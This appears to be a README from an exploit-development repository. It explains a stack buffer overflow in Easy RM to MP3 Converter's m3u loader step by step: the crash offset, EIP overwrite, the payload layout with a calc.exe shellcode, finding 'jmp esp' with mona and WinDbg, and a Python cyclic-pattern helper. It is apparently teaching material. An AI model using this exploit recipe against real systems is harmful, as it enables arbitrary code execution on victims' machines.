- app/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
Fuzz the load functionality for m3u files. The application crashes when we send 30k bytes of garbage data. We locate the exact offset by sending a unique pattern: the offset is 26100. Then we set EIP to 0xdeadbeef to confirm the EIP overwrite. After confirming the overwrite, we build our payload as follows: payload = JUNK(26100 chars) + EIP + NOP_SLED(sizeof(char *) * 100) + shellcode(calc.exe)
We need "jmp esp"-like functionality. We can find "jmp esp" in the loaded modules (DLLs). To do this we run !mona modules in Immunity Debugger. Then we pick a module that has neither ASLR nor Rebase enabled. In our case it is shell32.dll, a default operating system DLL. We find "jmp esp" inside shell32.dll with the following mona command: "!mona find -s '\xff\xe4' -m shell32.dll" (alternatively we can use a command like this: !mona jmp -r esp -m MSRMfilter03.dll). Now we set our controlled EIP to the address of "\xff\xe4", in this case 0x7c9d31ef. When EIP reaches 0x7c9d31ef, the CPU executes the opcodes at that address and jumps onto the stack. EIP is now in the NOP sled; once the sled is finished, it starts to execute our shellcode. Win.
In the exploits folder there are exploits written in different languages for demonstration purposes.
We can create and locate patterns using the following:
PS D:\exploits\easyrmtomp3\exploits> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
PS D:\exploits\easyrmtomp3\exploits> cyclic -l "0x61617861"
91
- Jumping to a hard-coded memory address is not a good idea, especially if the address contains a null byte.
- "jmp esp" is common in DLLs.
- In WinDbg, use a (assemble) to assemble "jmp esp" and u to unassemble a given address.
- Try to find "jmp esp" in an application DLL first; if we take it from an OS DLL it may differ from version to version. WinDbg search for the opcode bytes over a module range: s 01b10000 l 01fdd000 ff e4
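How the pattern tool used in the session above finds an offset, and the null-byte caveat from the notes, as an added example that is not one of the exploits in this folder. It reimplements the cyclic / cyclic -l behaviour of pwntools (a de Bruijn sequence over a-z with 4-byte unique chunks, which is what the "aaaabaaac..." output corresponds to); the function names are my own and assumed.

```python
"""Cyclic pattern generation and offset lookup for crash triage.

Added example (not code from the exploits folder).  Assumed scheme: pwntools'
default, a de Bruijn sequence over the lowercase alphabet with 4-byte unique
chunks, matching the "aaaabaaacaaad..." output shown in the session.
"""
import struct

ALPHABET = "abcdefghijklmnopqrstuvwxyz"
CHUNK = 4  # every 4-character window of the sequence is unique


def de_bruijn(alphabet=ALPHABET, n=CHUNK):
    """Return the full de Bruijn sequence B(k, n) for the given alphabet.

    Every string of length n over the alphabet occurs exactly once, so a
    register holding any n consecutive bytes of the pattern identifies a
    single input offset (standard FKM construction).
    """
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)


_SEQUENCE = de_bruijn()  # 26**4 = 456976 characters, built once at import


def cyclic(length):
    """Equivalent of `cyclic <length>`: the first `length` characters of the pattern."""
    if length > len(_SEQUENCE):
        raise ValueError("pattern longer than the unique sequence (%d)" % len(_SEQUENCE))
    return _SEQUENCE[:length]


def cyclic_find(value):
    """Equivalent of `cyclic -l <value>`: offset of a 4-byte chunk in the pattern.

    `value` may be the 4-character chunk itself or the 32-bit register value
    read at the crash (e.g. EIP), which is unpacked little-endian as on x86.
    Returns -1 if the chunk does not occur in the pattern.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii", errors="replace")
    else:
        needle = value
    if len(needle) != CHUNK:
        raise ValueError("need exactly %d characters" % CHUNK)
    return _SEQUENCE.find(needle)


def has_null_byte(address):
    """True if the little-endian encoding of a 32-bit address contains 0x00.

    A return address containing a null byte is usually unusable when the
    input is handled as a C string, because the copy stops at the null.
    """
    return b"\x00" in struct.pack("<I", address)


if __name__ == "__main__":
    print(cyclic(100))
    print(cyclic_find(0x61617861))      # 91, as in the session above
    print(cyclic_find("axaa"))          # same chunk given as text
    print(has_null_byte(0x7c9d31ef))    # False
    print(has_null_byte(0x00401000))    # True: address contains a null byte
```

cyclic_find on the 4 characters that sit at position 26100 of a 30000-character pattern returns 26100, which is the lookup done above to locate the overwrite offset; the null-byte check is the test to run on a candidate "jmp esp" address before relying on it.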